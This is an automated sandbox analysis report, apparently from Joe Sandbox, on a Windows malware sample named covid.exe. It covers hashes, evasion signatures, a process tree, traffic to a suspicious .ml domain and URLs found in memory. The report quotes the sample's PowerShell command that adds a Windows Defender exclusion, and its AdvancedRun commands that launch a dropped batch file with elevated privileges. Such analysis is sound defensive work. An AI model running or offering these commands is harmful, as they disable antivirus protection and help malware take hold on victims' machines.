Analysis Report covid.exe

Overview

General Information

Sample Name:covid.exe
Analysis ID:393947
MD5:99e3b458dee79b33209d39d19692ae08
SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: 99E3B458DEE79B33209D39D19692AE08)
    • AdvancedRun.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6224 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6640 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: covid.exe Virustotal: Detection: 40%
Source: covid.exe ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: covid.exe Joe Sandbox ML: detected
Source: covid.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: mmwrlridbhmibnr.ml Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: mmwrlridbhmibnr.ml
Source: Joe Sandbox View IP Address: 172.67.220.147
Source: unknown DNS traffic detected: queries for: mmwrlridbhmibnr.ml
Source: covid.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: covid.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 0000000F.00000002.432355144.0000000002DF8000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: covid.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: covid.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: covid.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: covid.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: covid.exe, 00000000.00000003.236314820.0000000005B22000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6cc8150004891
Source: covid.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: covid.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/BreadcrumbList
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/ListItem
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/NewsArticle
Source: powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: covid.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr String found in binary or memory: http://www.nirsoft.net/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://felix.data.tm-awx.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ded/script.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: covid.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
